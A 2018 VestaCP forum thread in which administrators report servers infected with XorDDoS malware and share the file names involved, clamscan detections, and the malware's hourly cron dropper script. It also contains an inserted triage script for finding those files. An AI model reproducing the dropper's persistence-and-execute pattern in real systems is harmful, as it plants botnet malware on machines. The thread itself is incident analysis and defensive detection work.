Vesta Control Panel - Forum

Community Forum


Got 10 VestaCP servers exploited

General questions about VestaCP
549 posts
  • Page 1 of 55
albertus
Posts: 12
Joined: Sat Apr 07, 2018 2:45 pm

Os: CentOS 6x
Web: apache + nginx
Got 10 VestaCP servers exploited

Post by albertus » Sat Apr 07, 2018 2:56 pm

Hello!

Today I was surprised to discover that 10 of our customers' servers were being exploited (attacking a Chinese IP). All these servers have nothing in common but the fact that they all run VestaCP. None of my non-VestaCP servers were affected.

I would like to ask if anyone was also affected. Any chance there's a VestaCP vulnerability being exploited in the wild?

Thank you in advance

Kindly, Albertus

lukapaunovic
Posts: 73
Joined: Sun Dec 03, 2017 6:30 pm

Re: Got 10 VestaCP servers exploited

Post by lukapaunovic » Sat Apr 07, 2018 3:35 pm

This happened to my clients.
I have 3 clients from different geographic locations.
All they have in common is that their server got suspended by OVH and that they are using Vesta.
They all allegedly did a SYN flood to the same IP:

111.231.132.129

Which is crazy.

dpeca
VestaCP Team
Posts: 473
Joined: Wed Nov 25, 2015 7:30 pm

Re: Got 10 VestaCP servers exploited

Post by dpeca » Sat Apr 07, 2018 3:35 pm

Albertus, where are your servers?
OVH?

lukapaunovic
Posts: 73
Joined: Sun Dec 03, 2017 6:30 pm

Re: Got 10 VestaCP servers exploited

Post by lukapaunovic » Sat Apr 07, 2018 3:37 pm

Interestingly, OVH refuses to provide rescue access to the backup files so I can investigate what happened.
For one server they provided read-only FTP access, and I can't read/download/open any of the files.
This is really suspicious to me.
It looks like OVH nodes got hacked.

dpeca
VestaCP Team
Posts: 473
Joined: Wed Nov 25, 2015 7:30 pm

Re: Got 10 VestaCP servers exploited

Post by dpeca » Sat Apr 07, 2018 3:55 pm

Albertus, can you tell us which variant of Vesta you installed, the default (nginx+apache) or nginx+fpm?
What Linux distribution are you using?

StudioMaX
Posts: 33
Joined: Fri Aug 05, 2016 12:17 pm

Os: CentOS 6x
Web: apache + nginx
Re: Got 10 VestaCP servers exploited

Post by StudioMaX » Sat Apr 07, 2018 3:58 pm

Me too. I've created another thread (in Russian). But my provider is FastVPS, not OVH.

lukapaunovic
Posts: 73
Joined: Sun Dec 03, 2017 6:30 pm

Re: Got 10 VestaCP servers exploited

Post by lukapaunovic » Sat Apr 07, 2018 4:11 pm

One of the client's VPSes at OVH got unlocked.
First they strongly resisted even giving rescue access to the files, and then they simply unlocked it and didn't say what the deal was.
I am just going to block that IP in the firewall, as I found no evidence in the logs after the server got unlocked that it was attacked like they claim.

dmitry-itldc
Posts: 1
Joined: Sat Apr 07, 2018 4:41 pm

Os: CentOS 6x
Web: nginx + php-fpm
Re: Got 10 VestaCP servers exploited

Post by dmitry-itldc » Sat Apr 07, 2018 4:50 pm

The same thing: some VDSes were exploited; all have Vesta installed on CentOS 7, as far as I see.

Most of the systems were compromised a few days ago (4-5 April). The malicious software used for the attacks is a variant of Linux/Xorddos.C (https://en.wikipedia.org/wiki/Xor_DDoS); you can find files like gcc.sh, /tmp/update, /usr/lib/libudev.so.

Clamscan can detect this malware, for example:

# clamscan -r -i /usr
/usr/bin/tcfndpnals: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND

We are still investigating how the systems were compromised.

StudioMaX
Posts: 33
Joined: Fri Aug 05, 2016 12:17 pm

Os: CentOS 6x
Web: apache + nginx
Re: Got 10 VestaCP servers exploited

Post by StudioMaX » Sat Apr 07, 2018 5:03 pm

Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00:

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
# bring up every interface listed in /proc/net/dev, each in the background
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
# copy the dropped binary under a library-like name and execute it
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

I did not think that the infection was a few days ago. I analyzed all the logs for today: nothing suspicious, no authorization in Vesta and so on.
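A triage check for the artefacts named in the two posts above (dmitry-itldc's file list and StudioMaX's hourly cron script), added here as an example; it is not code from the thread or from the VestaCP project. The file paths come from the posts; the function names and the constructed sample tree are my own, and a hit is a lead to confirm with clamscan or by inspecting the file, not proof of infection.

```shell
#!/bin/sh
# Added triage helper (not from the thread). Checks a filesystem root for the
# XorDDoS artefacts reported above: the gcc.sh cron dropper, the fake
# libudev.so and /tmp/update. ROOT may be "" (live host) or an offline mount.

# xorddos_check ROOT: print suspect paths under ROOT.
# Returns 0 when nothing was found, 1 otherwise.
xorddos_check() {
  root="$1"
  found=0
  # Filenames reported by dmitry-itldc and StudioMaX in this thread.
  for p in /etc/cron.hourly/gcc.sh /lib/libudev.so /lib/libudev.so.6 \
           /usr/lib/libudev.so /tmp/update; do
    if [ -e "$root$p" ]; then
      echo "SUSPECT path: $root$p"
      found=$((found + 1))
    fi
  done
  # The dropper brings interfaces up, copies libudev.so and executes it;
  # flag any hourly cron script that does the same, even if it was renamed.
  for f in "$root"/etc/cron.hourly/*; do
    [ -f "$f" ] || continue
    if grep -q 'libudev\.so' "$f" && grep -q 'ifconfig' "$f"; then
      echo "SUSPECT content: $f"
      found=$((found + 1))
    fi
  done
  [ "$found" -eq 0 ]
}

# make_sample_tree: build a constructed, harmless test tree that mimics an
# infected host (plain-text stand-ins, no real malware) and print its path.
make_sample_tree() {
  t=$(mktemp -d)
  mkdir -p "$t/etc/cron.hourly" "$t/lib"
  printf '#!/bin/sh\nfor i in eth0; do ifconfig $i up& done\n' > "$t/etc/cron.hourly/gcc.sh"
  printf 'cp /lib/libudev.so /lib/libudev.so.6\n/lib/libudev.so.6\n' >> "$t/etc/cron.hourly/gcc.sh"
  : > "$t/lib/libudev.so"                          # stand-in for the dropped binary
  printf '#!/bin/sh\nexit 0\n' > "$t/etc/cron.hourly/0anacron"  # benign, must not fire
  echo "$t"
}

# Usage: run against the constructed tree (expect hits), then against the host.
sample=$(make_sample_tree)
xorddos_check "$sample" || echo "sample tree: artefacts found (expected)"
```

Run `xorddos_check ""` as root on a suspect host, or point it at a mounted rescue image; on a live system the hourly cron scan still works when the dropper used a name other than gcc.sh.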

lukapaunovic
Posts: 73
Joined: Sun Dec 03, 2017 6:30 pm

Re: Got 10 VestaCP servers exploited

Post by lukapaunovic » Sat Apr 07, 2018 5:11 pm

I also see gcc.sh present and the unix tool....
:(
